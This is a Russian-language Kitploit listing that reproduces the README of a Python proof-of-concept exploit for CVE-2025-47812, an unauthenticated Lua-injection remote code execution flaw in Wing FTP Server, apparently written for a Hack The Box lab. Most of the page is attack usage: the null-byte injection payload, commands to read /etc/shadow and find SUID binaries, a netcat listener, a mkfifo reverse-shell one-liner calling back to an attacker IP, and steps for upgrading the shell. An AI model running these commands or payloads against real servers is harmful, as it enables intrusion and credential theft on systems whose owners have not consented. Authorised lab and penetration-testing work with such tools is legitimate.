Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-47812 — CVE-2025-47812 Poc для wingdata HTB | Kitploit
Инструменты/GitHubGitHub/0xs4n4tg/cve-2025-47812
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHub0xs4n4tg/cve-2025-47812

CVE-2025-47812

CVE-2025-47812 Poc для wingdata HTB

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-47812 — Wing FTP Server: неавторизованное RCE (переработанный)

Эксплойт на Python для неавторизованного RCE через внедрение Lua в Wing FTP Server ≤ 7.4.3. Предназначен для доставки оболочки — одна команда от check до работающего обратного вызова netcat.

Написан некоторое время назад для лаборатории wingData на HTB и теперь опубликован. Используйте только против систем, которыми вы владеете или имеете письменное разрешение на тестирование.

Благодарности

  • Исследование уязвимости: Julien (@MrTuxracer) — What the NULL?! Wing FTP Server RCE (CVE-2025-47812)
  • Оригинальный PoC: @4m3rr0r — github.com/4m3rr0r/CVE-2025-47812-poc
  • Этот репозиторий: переписанный PoC, который немного более функционален и проще в использовании.

Краткое описание уязвимости

Функция c_CheckUser() в Wing FTP обрезает username до первого нулевого байта для аутентификации, но при создании сессии записывает полное неочищенное имя пользователя в файл сессии Lua. Внедрите anonymous%00]]<lua>--, и сервер с радостью запишет ваш Lua-код в сессию. Обращение к любой аутентифицированной конечной точке ( работает) загружает этот файл сессии через → , выполняя внедренный код от имени / .

Скачать инструмент
dir.html
loadfile()
f()
root
SYSTEM

Затронутые версии: Wing FTP Server ≤ 7.4.3. Исправлено в 7.4.4.

Установка

root@kitploit:~
pip install requests

Вот и всё — никаких других зависимостей.

Использование

root@kitploit:~
# 1. Проверка уязвимости цели (выполняет `id` и проверяет наличие `uid=`)
python3 exploit.py -u http://target:5466/ check

# 2. Одиночная команда — захватывает stdout И stderr
python3 exploit.py -u http://target:5466/ exec "id"
python3 exploit.py -u http://target:5466/ exec "cat /etc/shadow"
python3 exploit.py -u http://target:5466/ exec "find / -perm -4000 2>/dev/null"

# 3. Реверсивная оболочка (простой путь)
#    Терминал 1:
nc -lvnp 4444
#    Терминал 2:
python3 exploit.py -u http://target:5466/ shell 10.10.14.5 4444

# 4. Отсоединенный произвольный payload — запустил и забыл. Полезно, когда нет bash:
python3 exploit.py -u http://target:5466/ detached \
  "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f"

Флаги

ФлагПо умолчаниюНазначение
-u, --urlобязательныйБазовый URL цели — Wing FTP обычно слушает на :5466 (HTTP) или :5467 (HTTPS).
-U, --usernameanonymousИмя пользователя до нулевого байта. Anonymous работает на установках по умолчанию.
-P, --passwordпустоПароль для POST-запроса внедрения. Пустой подходит для anonymous.
-v, --verboseвыклВыводит Lua-полезную нагрузку, посещенные URL и исходное тело ответа.

Советы

  • Сначала проверьте порт. Веб-интерфейс не на 80 по умолчанию — попробуйте http://target:5466/login.html в браузере, прежде чем считать URL неверным.
  • Если режим shell не возвращает обратный вызов, переключитесь на detached с payload через mkfifo выше. В некоторых минимальных образах Linux нет bash.
  • Улучшите полученную оболочку после подключения:
    root@kitploit:~
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    # Ctrl+Z
    stty raw -echo; fg
    # Enter, Enter
    export TERM=xterm
    

Отказ от ответственности

Только для образовательных целей и авторизованного тестирования безопасности. Вы несете ответственность за цели, на которые направляете этот инструмент.

Лицензия

MIT — см. LICENSE.